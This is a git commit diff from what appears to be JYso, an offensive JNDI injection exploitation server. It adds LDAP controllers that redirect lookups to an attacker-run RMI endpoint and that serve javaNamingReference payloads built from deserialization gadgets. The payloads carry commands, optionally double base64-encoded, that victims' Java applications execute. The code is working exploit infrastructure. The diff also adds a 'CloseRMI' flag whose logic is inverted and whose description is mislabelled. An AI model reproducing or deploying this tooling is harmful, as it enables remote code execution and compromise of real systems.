feat: add onlyref ldap2rmi

This commit is contained in:
qi4l
2024-10-31 14:41:37 +08:00
parent e81502d8e9
commit 4be7384106
5 changed files with 162 additions and 1 deletions
+3 -1
View File
@@ -33,7 +33,9 @@ public class Starter {
}
LdapServer.start();
HTTPServer.start();
RMIServer.start();
if (Config.CloseRMI) {
RMIServer.start();
}
}
// 如果参数中包含-y,则启动ysoserial
@@ -22,6 +22,7 @@ import static org.fusesource.jansi.Ansi.ansi;
@LdapMapping(uri = {"/basic"})
public class BasicController implements LdapController {
private static String payloadType;
//最后的反斜杠不能少
private final String codebase = Config.codeBase;
@@ -0,0 +1,33 @@
package com.qi4l.JYso.controllers;
import com.qi4l.JYso.exceptions.IncorrectParamsException;
import com.qi4l.JYso.exceptions.UnSupportedActionTypeException;
import com.qi4l.JYso.exceptions.UnSupportedGadgetTypeException;
import com.qi4l.JYso.exceptions.UnSupportedPayloadTypeException;
import com.qi4l.JYso.gadgets.Config.Config;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
@LdapMapping(uri = {"/ldap2rmi"})
public class ldap2rmiController implements LdapController {
private final String ip = Config.ip;
private final String rmiPort = String.valueOf(Config.rmiPort);
@Override
public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
System.out.println("[LDAP] Change LDAP to RMI ");
Entry e = new Entry(base);
e.addAttribute("javaClassName", "foo");
e.addAttribute("javaRemoteLocation", "rmi://" + ip + ":" + rmiPort);
result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
@Override
public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException, UnSupportedActionTypeException {
}
}
@@ -0,0 +1,123 @@
package com.qi4l.JYso.controllers;
import com.qi4l.JYso.enumtypes.GadgetType;
import com.qi4l.JYso.enumtypes.PayloadType;
import com.qi4l.JYso.exceptions.IncorrectParamsException;
import com.qi4l.JYso.exceptions.UnSupportedActionTypeException;
import com.qi4l.JYso.exceptions.UnSupportedGadgetTypeException;
import com.qi4l.JYso.exceptions.UnSupportedPayloadTypeException;
import com.qi4l.JYso.gadgets.ObjectPayload;
import com.qi4l.JYso.gadgets.utils.Serializer;
import com.qi4l.JYso.gadgets.utils.Util;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import org.apache.commons.cli.CommandLine;
import javax.naming.RefAddr;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import java.io.ByteArrayOutputStream;
import java.util.Base64;
import java.util.Enumeration;
import static com.qi4l.JYso.gadgets.Config.Config.BCEL1;
import static org.fusesource.jansi.Ansi.ansi;
@LdapMapping(uri = {"/onlyref"})
public class onlyRefController implements LdapController{
public static String gadgetType;
public static String cmd11;
public static GadgetType gadgetType1;
public static CommandLine cmdLine;
private PayloadType payloadType;
private String params;
@Override
public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
System.out.println("[LDAP] Sending Reference object (onlyRef)");
Entry e = new Entry(base);
try {
final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(gadgetType);
ObjectPayload payload = payloadClass.newInstance();
Object object = payload.getObject(params);
Reference ref = (Reference) object;
e.addAttribute("objectClass", "javaNamingReference");
e.addAttribute("javaClassName", ref.getClassName());
e.addAttribute("javaFactory", ref.getFactoryClassName());
Enumeration<RefAddr> enumeration = ref.getAll();
int posn = 0;
while (enumeration.hasMoreElements()) {
StringRefAddr addr = (StringRefAddr) enumeration.nextElement();
e.addAttribute("javaReferenceAddress", "#" + posn + "#" + addr.getType() + "#" + addr.getContent());
posn ++;
}
result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
} catch (Throwable er) {
System.err.println("Error while generating or serializing payload");
er.printStackTrace();
}
}
@Override
public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException, UnSupportedActionTypeException {
try {
base = base.replace('\\', '/');
int firstIndex = base.indexOf("/");
int secondIndex = base.indexOf("/", firstIndex + 1);
try {
gadgetType = base.substring(firstIndex + 1, secondIndex);
System.out.println(ansi().render("@|green [+] GaddgetType : |@" + gadgetType));
} catch (IllegalArgumentException e) {
throw new UnSupportedGadgetTypeException("UnSupportGaddgetType >> " + base.substring(firstIndex + 1, secondIndex));
}
int thirdIndex = base.indexOf("/", secondIndex + 1);
int fourIndex = base.indexOf("/", thirdIndex + 1);
String Ty1 = base.substring(thirdIndex + 1, fourIndex);
gadgetType1 = GadgetType.valueOf(Ty1.toLowerCase());
// 若第三个斜杠不存在,则把其设置成为字符串的长度
if (thirdIndex < 0) thirdIndex = base.length();
try {
// 将类型值设为从第二个斜杠后的字符串到第三个斜杠前(不包括第三个斜杠)所表示的字符串转换为 PayloadType 枚举类型
String Ty3 = base.substring(secondIndex + 1, thirdIndex);
payloadType = PayloadType.valueOf(Ty3.toLowerCase());
} catch (IllegalArgumentException e) {
throw new UnSupportedPayloadTypeException("UnSupportedPayloadType: " + base.substring(secondIndex + 1, thirdIndex));
}
if (payloadType == PayloadType.sethttp) {
params = BCEL1;
System.out.println(ansi().render("@|green [+] command|@" + BCEL1));
}
if (payloadType == PayloadType.command) {
if (gadgetType1 == GadgetType.base64) {
cmd11 = Util.getCmdFromBase(base);
}
if (gadgetType1 == GadgetType.base64Two) {
String encodedString = Util.getCmdFromBase(base);
byte[] decodedBytes = Base64.getDecoder().decode(encodedString);
String T1 = new String(decodedBytes);
byte[] decodedBytes1 = Base64.getDecoder().decode(T1);
cmd11 = new String(decodedBytes1);
}
params = cmd11;
System.out.println(ansi().render("@|green [+] command|@" + cmd11));
}
} catch (Exception e) {
if (e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException) e;
if (e instanceof UnSupportedGadgetTypeException) throw (UnSupportedGadgetTypeException) e;
throw new IncorrectParamsException("Incorrect params >> " + base);
}
}
}
@@ -41,6 +41,8 @@ public class Config {
public static String USER = "";
@Parameter(names = {"-tP", " --TLSProxy"}, help = true, description = "TLS port forwarding", order = 5)
public static boolean TLSProxy = false;
@Parameter(names = {"-cR", " --CloseRMI"}, help = true, description = "TLS port forwarding", order = 5)
public static boolean CloseRMI = false;
@Parameter(names = {"-p", " --PASSWD"}, help = true, description = "ldap binding password", order = 5)
public static String PASSWD = "";
@Parameter(names = {"-kF", " --keyFile"}, help = true, description = "Path to the TLS private key file", order = 5)